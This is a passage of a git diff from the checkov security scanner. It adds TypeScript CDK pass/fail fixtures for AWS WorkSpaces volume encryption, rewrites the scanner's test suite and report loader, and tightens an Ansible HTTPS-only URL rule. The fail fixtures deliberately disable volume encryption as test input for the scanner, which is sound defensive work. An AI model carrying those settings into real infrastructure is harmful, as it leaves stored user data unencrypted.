+const app = new App();
+new WorkSpacesStack(app, 'WorkSpacesStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/pass.ts b/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/pass.ts
new file mode 100644
index 00000000000..2b610ec03c2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/pass.ts
@@ -0,0 +1,26 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as workspaces from 'aws-cdk-lib/aws-workspaces';
+import { Construct } from 'constructs';
+
+class WorkSpacesStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Assuming the Directory ID is known and exists. Replace 'your-directory-id' with the actual Directory ID.
+    const directoryId = 'your-directory-id';
+
+    // Create a WorkSpaces workspace with root volume encryption enabled
+    new workspaces.CfnWorkspace(this, 'MyWorkspace', {
+      directoryId: directoryId, // Use the known Directory ID
+      bundleId: 'wsb-12345678', // Replace with your actual bundle ID
+      userName: 'my-user',
+      rootVolumeEncryptionEnabled: true,
+      userVolumeEncryptionEnabled: false, // Set to true if you want user volume encryption
+      // Other properties for your Workspace as needed
+    });
+  }
+}
+
+const app = new App();
+new WorkSpacesStack(app, 'WorkSpacesStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/fail__1__.ts b/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/fail__1__.ts
new file mode 100644
index 00000000000..8a0c1239680
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/fail__1__.ts
@@ -0,0 +1,27 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as workspaces from 'aws-cdk-lib/aws-workspaces';
+import { Construct } from 'constructs';
+
+class WorkSpacesStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Note: The creation of a WorkSpaces directory as depicted in the Python code isn't directly supported through AWS CDK as of my last update.
+    // Typically, you would use an existing directory (like an AD Connector or a Simple AD).
+    // However, let's assume we're associating the workspace with an existing directory for this example.
+
+    // Create a WorkSpaces workspace with root volume encryption enabled
+    new workspaces.CfnWorkspace(this, 'MyWorkspace', {
+      directoryId: 'your-directory-id', // Replace with your actual directory ID
+      userName: 'my-user',
+      bundleId: 'wsb-12345678', // Replace with your actual bundle ID
+      rootVolumeEncryptionEnabled: false,
+      userVolumeEncryptionEnabled: false, // Set to true if you want user volume encryption
+      // Workspace properties need to be defined here, if necessary.
+    });
+  }
+}
+
+const app = new App();
+new WorkSpacesStack(app, 'WorkSpacesStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/pass.ts b/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/pass.ts
new file mode 100644
index 00000000000..aa0ee09f78f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/pass.ts
@@ -0,0 +1,26 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as workspaces from 'aws-cdk-lib/aws-workspaces';
+import { Construct } from 'constructs';
+
+class WorkSpacesStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Assuming the Directory ID is known and exists. Replace 'your-directory-id' with the actual Directory ID.
+    const directoryId = 'your-directory-id';
+
+    // Create a WorkSpaces workspace with root volume encryption enabled
+    new workspaces.CfnWorkspace(this, 'MyWorkspace', {
+      directoryId: directoryId, // Use the known Directory ID
+      bundleId: 'wsb-12345678', // Replace with your actual bundle ID
+      userName: 'my-user',
+      rootVolumeEncryptionEnabled: true,
+      userVolumeEncryptionEnabled: true, // Set to true if you want user volume encryption
+      // Other properties for your Workspace as needed
+    });
+  }
+}
+
+const app = new App();
+new WorkSpacesStack(app, 'WorkSpacesStack');
+app.synth();
diff --git a/cdk_integration_tests/test_checks_typescript.py b/cdk_integration_tests/test_checks_typescript.py
index aa7e4cc6e34..31591d54f28 100644
--- a/cdk_integration_tests/test_checks_typescript.py
+++ b/cdk_integration_tests/test_checks_typescript.py
@@ -1,27 +1,425 @@
-from cdk_integration_tests.utils import run_check
+from typing import Dict, Any, List
+
 import pytest
 
+from cdk_integration_tests.utils import run_check, load_failed_checks_from_file
+
+LANGUAGE = 'typescript'
+
+
+@pytest.fixture(scope="session", autouse=True)
+def failed_checks() -> Dict[str, List[Dict[str, Any]]]:
+    report_failed_checks = load_failed_checks_from_file(LANGUAGE)
+    yield report_failed_checks
+
+
+def test_CKV_AWS_131_ALBDropHttpHeaders(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_131", policy_name="ALBDropHttpHeaders",
+              language="typescript")
+
+
+def test_CKV_AWS_2_ALBListenerHTTPS(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_2", policy_name="ALBListenerHTTPS", language="typescript")
+
+
+def test_CKV_AWS_59_APIGatewayAuthorization(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_59", policy_name="APIGatewayAuthorization",
+              language="typescript")
+
+
+def test_CKV_AWS_76_APIGatewayAccessLogging(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_76", policy_name="APIGatewayAccessLogging",
+              language="typescript")
+
+
+def test_CKV_AWS_120_APIGatewayCacheEnable(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_120", policy_name="APIGatewayCacheEnable",
+              language="typescript")
+
+
+def test_CKV_AWS_95_APIGatewayV2AccessLogging(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_95", policy_name="APIGatewayV2AccessLogging",
+              language="typescript")
+
+
+def test_CKV_AWS_73_APIGatewayXray(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_73", policy_name="APIGatewayXray", language="typescript")
+
+
+def test_CKV_AWS_194_AppSyncFieldLevelLogs(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_194", policy_name="AppSyncFieldLevelLogs",
+              language="typescript")
+
+
+def test_CKV_AWS_193_AppSyncLogging(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_193", policy_name="AppSyncLogging", language="typescript")
+
+
+def test_CKV_AWS_82_AthenaWorkgroupConfiguration(failed_checks):
+    # need to wait for variable rendering in TS
+    run_check(check_results=failed_checks, check_id="CKV_AWS_82", policy_name="AthenaWorkgroupConfiguration",
+              language="typescript")
+
+
+def test_CKV_AWS_131_AmazonMQBrokerPublicAccess(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_69", policy_name="AmazonMQBrokerPublicAccess",
+              language="typescript")
+
+
+def test_CKV_AWS_96_AuroraEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_96", policy_name="AuroraEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_166_BackupVaultEncrypted(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_166", policy_name="BackupVaultEncrypted",
+              language="typescript")
+
+
+def test_CKV_AWS_174_CloudFrontTLS12(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_174", policy_name="CloudFrontTLS12", language="typescript")
+
+
+def test_CKV_AWS_36_CloudTrailLogValidation(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_36", policy_name="CloudTrailLogValidation",
+              language="typescript")
+
+
+def test_CKV_AWS_20_S3PublicACLRead(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_20", policy_name="S3PublicACLRead", language="typescript")
+
+
+def test_CKV_AWS_56_S3RestrictPublicBuckets(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_56", policy_name="S3RestrictPublicBuckets",
+              language="typescript")
+
+
+def test_CKV_AWS_149_SecretManagerSecretEncrypted(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_149", policy_name="SecretManagerSecretEncrypted",
+              language="typescript")
+
+
+def test_CKV_AWS_23_SecurityGroupRuleDescription(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_23", policy_name="SecurityGroupRuleDescription",
+              language="typescript")
+
+
+def test_CKV_AWS_26_SNSTopicEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_26", policy_name="SNSTopicEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_27_SQSQueueEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_27", policy_name="SQSQueueEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_164_TransferServerIsPublic(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_164", policy_name="TransferServerIsPublic",
+              language="typescript")
+
+
+def test_CKV_AWS_123_VPCEndpointAcceptanceConfigured(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_123", policy_name="VPCEndpointAcceptanceConfigured",
+              language="typescript")
+
+
+def test_CKV_AWS_68_WAFEnabled(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_68", policy_name="WAFEnabled", language="typescript")
+
+
+def test_CKV_AWS_156_WorkspaceRootVolumeEncrypted(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_156", policy_name="WorkspaceRootVolumeEncrypted",
+              language="typescript")
+
+
+def test_CKV_AWS_155_WorkspaceUserVolumeEncrypted(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_155", policy_name="WorkspaceUserVolumeEncrypted",
+              language="typescript")
+
+
+def test_CKV_AWS_88_EC2PublicIP(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_88", policy_name="EC2PublicIP", language="typescript")
+
+
+def test_CKV_AWS_163_ECRImageScanning(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_163", policy_name="ECRImageScanning",
+              language="typescript")
+
+
+def test_CKV_AWS_51_ECRImmutableTags(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_51", policy_name="ECRImmutableTags", language="typescript")
+
+
+def test_CKV_AWS_136_ECRRepositoryEncrypted(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_136", policy_name="ECRRepositoryEncrypted",
+              language="typescript")
+
+
+def test_CKV_AWS_65_ECSClusterContainerInsights(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_65", policy_name="ECSClusterContainerInsights",
+              language="typescript")
+
+
+def test_CKV_AWS_97_ECSTaskDefinitionEFSVolumeEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_97", policy_name="ECSTaskDefinitionEFSVolumeEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_42_EFSEncryptionEnabled(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_42", policy_name="EFSEncryptionEnabled",
+              language="typescript")
+
+
+def test_CKV_AWS_58_EKSSecretsEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_58", policy_name="EKSSecretsEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_29_ElasticacheReplicationGroupEncryptionAtRest(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_29",
+              policy_name="ElasticacheReplicationGroupEncryptionAtRest", language="typescript")
+
+
+def test_CKV_AWS_30_ElasticacheReplicationGroupEncryptionAtTransit(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_30",
+              policy_name="ElasticacheReplicationGroupEncryptionAtTransit",
+              language="typescript")
+
+
+def test_CKV_AWS_31_ElasticacheReplicationGroupEncryptionAtTransitAuthToken(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_31",
+              policy_name="ElasticacheReplicationGroupEncryptionAtTransitAuthToken",
+              language="typescript")
+
+
+def test_CKV_AWS_83_ElasticsearchDomainEnforceHTTPS(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_83", policy_name="ElasticsearchDomainEnforceHTTPS",
+              language="typescript")
+
+
+def test_CKV_AWS_84_ElasticsearchDomainLogging(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_84", policy_name="ElasticsearchDomainLogging",
+              language="typescript")
+
+
+def test_CKV_AWS_92_ELBAccessLogs(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_92", policy_name="ELBAccessLogs", language="typescript")
+
+
+def test_CKV_AWS_91_ELBv2AccessLogs(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_91", policy_name="ELBv2AccessLogs", language="typescript")
+
+
+def test_CKV_AWS_158_CloudWatchLogGroupKMSKey(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_158", policy_name="CloudWatchLogGroupKMSKey",
+              language="typescript")
+
+
+def test_CKV_AWS_66_CloudWatchLogGroupRetention(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_66", policy_name="CloudWatchLogGroupRetention",
+              language="typescript")
+
+
+def test_CKV_AWS_34_CloudfrontDistributionEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_34", policy_name="CloudfrontDistributionEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_86_CloudfrontDistributionLogging(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_86", policy_name="CloudfrontDistributionLogging",
+              language="typescript")
+
+
+def test_CKV_AWS_35_CloudtrailEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_35", policy_name="CloudtrailEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_67_CloudtrailMultiRegion(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_67", policy_name="CloudtrailMultiRegion",
+              language="typescript")
+
+
+def test_CKV_AWS_78_CodeBuildProjectEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_78", policy_name="CodeBuildProjectEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_47_DAXEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_47", policy_name="DAXEncryption", language="typescript")
+
+
+def test_CKV_AWS_89_DMSReplicationInstancePubliclyAccessible(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_89",
+              policy_name="DMSReplicationInstancePubliclyAccessible", language="typescript")
+
+
+def test_CKV_AWS_104_DocDBAuditLogs(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_104", policy_name="DocDBAuditLogs", language="typescript")
+
+
+def test_CKV_AWS_74_DocDBEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_74", policy_name="DocDBEncryption", language="typescript")
+
+
+def test_CKV_AWS_90_DocDBTLS(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_90", policy_name="DocDBTLS", language="typescript")
+
+
+def test_CKV_AWS_165_DynamodbGlobalTableRecovery(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_165", policy_name="DynamodbGlobalTableRecovery",
+              language="typescript")
+
+
+def test_CKV_AWS_28_DynamodbRecovery(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_28", policy_name="DynamodbRecovery", language="typescript")
+
+
+def test_CKV_AWS_3_EBSEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_3", policy_name="EBSEncryption", language="typescript")
+
+
+def test_CKV_AWS_18_S3BucketLogging(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_18", policy_name="S3BucketLogging",
+              language="typescript")
+
+
+def test_CKV_AWS_19_S3BucketEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_19", policy_name="S3BucketEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_21_S3BucketVersioning(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_21", policy_name="S3BucketVersioning",
+              language="typescript")
+
+
+def test_CKV_AWS_145_S3BucketKMSEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_145", policy_name="S3BucketKMSEncryption",
+              language="typescript")
+
+
+def test_CKV2_AWS_6_S3BucketPublicAccessBlock(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV2_AWS_6", policy_name="S3BucketPublicAccessBlock",
+              language="typescript")
+
+
+def test_CKV_AWS_195_GlueSecurityConfigurationEnabled(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_195", policy_name="GlueSecurityConfigurationEnabled",
+              language="typescript")
+
+
+def test_CKV_AWS_5_ElasticsearchEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_5", policy_name="ElasticsearchEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_6_ElasticsearchNodeToNodeEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_6", policy_name="ElasticsearchNodeToNodeEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_94_GlueDataCatalogEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_94", policy_name="GlueDataCatalogEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_99_GlueSecurityConfiguration(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_99", policy_name="GlueSecurityConfiguration",
+              language="typescript")
+
+
+def test_CKV_AWS_40_IAMPolicyAttachedToGroupOrRoles(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_40", policy_name="IAMPolicyAttachedToGroupOrRoles",
+              language="typescript")
+
+
+def test_CKV_AWS_43_KinesisStreamEncryptionType(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_43", policy_name="KinesisStreamEncryptionType",
+              language="typescript")
+
+
+def test_CKV_AWS_116_LambdaDLQConfigured(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_116", policy_name="LambdaDLQConfigured",
+              language="typescript")
+
+
+def test_CKV_AWS_45_LambdaEnvironmentCredentials(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_45", policy_name="LambdaEnvironmentCredentials",
+              language="typescript")
+
+
+def test_CKV_AWS_173_LambdaEnvironmentEncryptionSettings(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_173", policy_name="LambdaEnvironmentEncryptionSettings",
+              language="typescript")
+
+
+def test_CKV_AWS_115_LambdaFunctionLevelConcurrentExecutionLimit(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_115",
+              policy_name="LambdaFunctionLevelConcurrentExecutionLimit", language="typescript")
+
+
+def test_CKV_AWS_117_LambdaInVPC(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_117", policy_name="LambdaInVPC", language="typescript")
+
+
+def test_CKV_AWS_8_LaunchConfigurationEBSEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_8", policy_name="LaunchConfigurationEBSEncryption",
+              language="typescript")
+
+
+def test_CKV_AWS_44_NeptuneClusterStorageEncrypted(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_44", policy_name="NeptuneClusterStorageEncrypted",
+              language="typescript")
+
+
+# unskip after BCE-33034
+# def test_CKV_AWS_118_RDSEnhancedMonitorEnabled(failed_checks):
+#     run_check(check_results=failed_checks, check_id="CKV_AWS_118", policy_name="RDSEnhancedMonitorEnabled",
+#               language="typescript")
+
+
+def test_CKV_AWS_157_RDSMultiAZEnabled(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_157", policy_name="RDSMultiAZEnabled",
+              language="typescript")
+
+
+def test_CKV_AWS_17_RDSPubliclyAccessible(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_17", policy_name="RDSPubliclyAccessible",
+              language="typescript")
+
+
+def test_CKV_AWS_105_RedShiftSSL(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_105", policy_name="RedShiftSSL",
+              language="typescript")
+
+
+def test_CKV_AWS_64_RedshiftClusterEncryption(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_64", policy_name="RedshiftClusterEncryption",
+              language="typescript")
+
 
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV_AWS_18_S3BucketLogging():
-    run_check(lang="typescript", check_name="S3BucketLogging")
+def test_CKV_AWS_71_RedshiftClusterLogging(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_71", policy_name="RedshiftClusterLogging",
+              language="typescript")
 
 
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV_AWS_19_S3BucketEncryption():
-    run_check(lang="typescript", check_name="S3BucketEncryption")
+def test_CKV_AWS_87_RedshiftClusterPubliclyAccessible(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_87", policy_name="RedshiftClusterPubliclyAccessible",
+              language="typescript")
 
 
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV_AWS_21_S3BucketVersioning():
-    run_check(lang="typescript", check_name="S3BucketVersioning")
+def test_CKV_AWS_154_RedshiftInEc2ClassicMode(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_154", policy_name="RedshiftInEc2ClassicMode",
+              language="typescript")
 
 
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV_AWS_145_S3BucketKMSEncryption():
-    run_check(lang="typescript", check_name="S3BucketKMSEncryption")
+def test_CKV_AWS_53_S3BlockPublicACLs(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_53", policy_name="S3BlockPublicACLs",
+              language="typescript")
 
 
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV2_AWS_6_S3BucketPublicAccessBlock():
-    run_check(lang="typescript", check_name="S3BucketPublicAccessBlock")
+def test_CKV_AWS_54_S3BlockPublicPolicy(failed_checks):
+    run_check(check_results=failed_checks, check_id="CKV_AWS_54", policy_name="S3BlockPublicPolicy",
+              language="typescript")
diff --git a/cdk_integration_tests/utils.py b/cdk_integration_tests/utils.py
index 666b7e8f121..ce76b44c669 100644
--- a/cdk_integration_tests/utils.py
+++ b/cdk_integration_tests/utils.py
@@ -3,30 +3,34 @@
 from typing import List, Dict, Any
 import yaml
 
+
 current_dir = os.path.dirname(os.path.realpath(__file__))
 
 
 def load_failed_checks_from_file(lang: str) -> Dict[str, List[Dict[str, Any]]]:
-    report_path = os.path.join(current_dir, '..', f'checkov_report_cdk_{lang}.json')
+    report_path = os.path.join(current_dir, '..', 'checkov_report_cdk.json')
     with open(report_path) as f:
         data = f.read()
-        report = json.loads(data)
-        assert report is not None
-        results = report.get("results", {})
-        failed_checks = results.get("failed_checks")
-        skipped_checks = results.get("skipped_checks")
-        results = {}
-        for check in failed_checks:
-            check_id = check['check_id']
-            if not results.get(check_id):
-                results[check_id] = []
-            results[check_id].append(check)
-        for check in skipped_checks:
-            check_id = check['check_id']
-            if not results.get(check_id):
-                results[check_id] = []
-            results[check_id].append(check)
-        return results
+        reports = json.loads(data)
+        for report in reports:
+            if report.get('check_type') == f'cdk_{lang}':
+                assert report is not None
+                results = report.get("results", {})
+                failed_checks = results.get("failed_checks")
+                skipped_checks = results.get("skipped_checks")
+                results = {}
+                for check in failed_checks:
+                    check_id = check['check_id']
+                    if not results.get(check_id):
+                        results[check_id] = []
+                    results[check_id].append(check)
+                for check in skipped_checks:
+                    check_id = check['check_id']
+                    if not results.get(check_id):
+                        results[check_id] = []
+                    results[check_id].append(check)
+                return results
+    return {}
 
 
 def is_policy_with_correct_check_id(check_id: str, language: str, policy_name: str) -> bool:
diff --git a/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml b/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml
index c79471f2dc3..bd813d8cc5f 100644
--- a/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml
+++ b/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml
@@ -3,10 +3,18 @@ metadata:
   name: "Ensure that HTTPS url is used with get_url"
   category: "NETWORKING"
 definition:
-  cond_type: attribute
-  resource_types:
-    - tasks.ansible.builtin.get_url
-    - tasks.get_url
-  attribute: url
-  operator: starting_with
-  value: "https://"
+  and:
+    - cond_type: attribute
+      resource_types:
+        - tasks.ansible.builtin.get_url
+        - tasks.get_url
+      attribute: url
+      operator: not_starting_with
+      value: "http://"
+    - cond_type: attribute
+      resource_types:
+        - tasks.ansible.builtin.get_url
+        - tasks.get_url
+      attribute: url
+      operator: not_starting_with
+      value: "ftp://"
diff --git a/checkov/ansible/graph_builder/local_graph.py b/checkov/ansible/graph_builder/local_graph.py
index b9cb799c659..db6c8a64554 100644
--- a/checkov/ansible/graph_builder/local_graph.py
+++ b/checkov/ansible/graph_builder/local_graph.py
@@ -69,7 +69,7 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") ->
                 # either it is actually not an Ansible file or a playbook without tasks refs
                 continue
 
-            resource_type = f"{ResourceType.TASKS}.{name}"
+            resource_type = f"{ResourceType.TASKS}.{prefix}{name}"
 
             if isinstance(config, str):
                 # this happens when modules have no parameters and are directly used with the user input
@@ -83,6 +83,10 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") ->
                     END_LINE: task[END_LINE],
                 }
 
+            if not isinstance(config, dict):
+                # either it is actually not an Ansible file or a playbook without tasks refs
+                continue
+
             attributes = pickle_deepcopy(config)
             attributes[CustomAttributes.RESOURCE_TYPE] = resource_type
 
@@ -94,11 +98,11 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") ->
             self.vertices.append(
                 Block(
                     name=f"{resource_type}.{task_name}",
-                    config=config,
+                    config=task,
                     path=file_path,
                     block_type=BlockType.RESOURCE,
                     attributes=attributes,
-                    id=f"{resource_type}.{prefix}{task_name}",
+                    id=f"{resource_type}.{task_name}",
                     source=self.source,
                 )
             )
diff --git a/checkov/ansible/runner.py b/checkov/ansible/runner.py
index f6ade71e9bb..8c0bd86c7be 100644
--- a/checkov/ansible/runner.py
+++ b/checkov/ansible/runner.py
@@ -2,6 +2,8 @@
 
 from typing import TYPE_CHECKING, Any
 
+from checkov.common.graph.checks_infra.registry import BaseRegistry
+
 from checkov.ansible.checks.registry import registry
 from checkov.ansible.graph_builder.graph_components.resource_types import ResourceType
 from checkov.ansible.graph_builder.local_graph import AnsibleLocalGraph
@@ -27,6 +29,7 @@ def __init__(
         source: str = "Ansible",
         graph_class: type[ObjectLocalGraph] = AnsibleLocalGraph,
         graph_manager: ObjectGraphManager | None = None,
+        external_registries: list[BaseRegistry] | None = None,
     ) -> None:
         super().__init__(
             db_connector=db_connector,
@@ -128,3 +131,6 @@ def build_definitions_context(
         definitions_raw: dict[str, list[tuple[int, str]]],
     ) -> dict[str, dict[str, Any]]:
         return build_definitions_context(definitions=definitions, definitions_raw=definitions_raw)
+
+    def set_definitions_raw(self, definitions_raw: dict[str, list[tuple[int, str]]]) -> None:
+        self.definitions_raw = definitions_raw
diff --git a/checkov/ansible/utils.py b/checkov/ansible/utils.py
index 2fb2696295f..a7da279a3c0 100644
--- a/checkov/ansible/utils.py
+++ b/checkov/ansible/utils.py
@@ -1,16 +1,20 @@
 from __future__ import annotations
 
 import logging
+import os
 import re
 from pathlib import Path
-from typing import Any
+from typing import Any, List
 
 from checkov.ansible.graph_builder.graph_components.resource_types import ResourceType
+from checkov.common.parallelizer.parallel_runner import parallel_runner
 from checkov.common.parsers.yaml.parser import parse
 from checkov.common.resource_code_logger_filter import add_resource_code_filter_to_logger
+from checkov.common.runners.base_runner import filter_ignored_paths
 from checkov.common.util.consts import START_LINE, END_LINE
 from checkov.common.util.file_utils import read_file_with_any_encoding
 from checkov.common.util.suppression import collect_suppressions_for_context
+from checkov.runner_filter import RunnerFilter
 
 TASK_NAME_PATTERN = re.compile(r"^\s*-\s+name:\s+", re.MULTILINE)
 
@@ -189,3 +193,36 @@ def _create_resource_context(definition_raw: list[tuple[int, str]], resource: di
         "code_lines": code_lines,
         "skipped_checks": skipped_checks,
     }
+
+
+def create_definitions(
+        root_folder: str | None,
+        files: list[str] | None = None,
+        runner_filter: RunnerFilter | None = None
+) -> tuple[dict[str, dict[str, Any]], dict[str, list[tuple[int, str]]]]:
+    runner_filter = runner_filter or RunnerFilter()
+    definitions: dict[str, dict[str, Any]] = {}
+    definitions_raw: dict[str, list[tuple[int, str]]] = {}
+    if files:
+        create_file_definition(files, definitions, definitions_raw)
+
+    if root_folder:
+        for root, d_names, f_names in os.walk(root_folder):
+            filter_ignored_paths(root, d_names, runner_filter.excluded_paths)
+            filter_ignored_paths(root, f_names, runner_filter.excluded_paths)
+            files_to_load = [os.path.join(root, f_name) for f_name in f_names]
+            create_file_definition(files_to_load, definitions, definitions_raw)
+
+    return definitions, definitions_raw
+
+
+def create_file_definition(files_to_load: List[str], definitions: dict[str, dict[str, Any]], definitions_raw: dict[str, list[tuple[int, str]]]) -> None:
+    results = parallel_runner.run_function(lambda f: (f, parse_file(f)), files_to_load)
+    for file_result_pair in results:
+        if file_result_pair is None:
+            # this only happens, when an uncaught exception occurs
+            continue
+
+        file, result = file_result_pair
+        if result:
+            (definitions[file], definitions_raw[file]) = result  # type: ignore[assignment]
diff --git a/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml b/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml
new file mode 100644
index 00000000000..cfaaf45376c
--- /dev/null
+++ b/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml
@@ -0,0 +1,15 @@
+metadata:
+  id: "CKV2_AZURE_49"
+  name: "Ensure that Azure Machine learning workspace is not configured with overly permissive network access"
+  category: "NETWORKING"
+definition:
+  or:
+  - cond_type: "attribute"
+    resource_types: "Microsoft.MachineLearningServices/workspaces"
+    attribute: "properties.publicNetworkAccess"
+    operator: "not_exists"
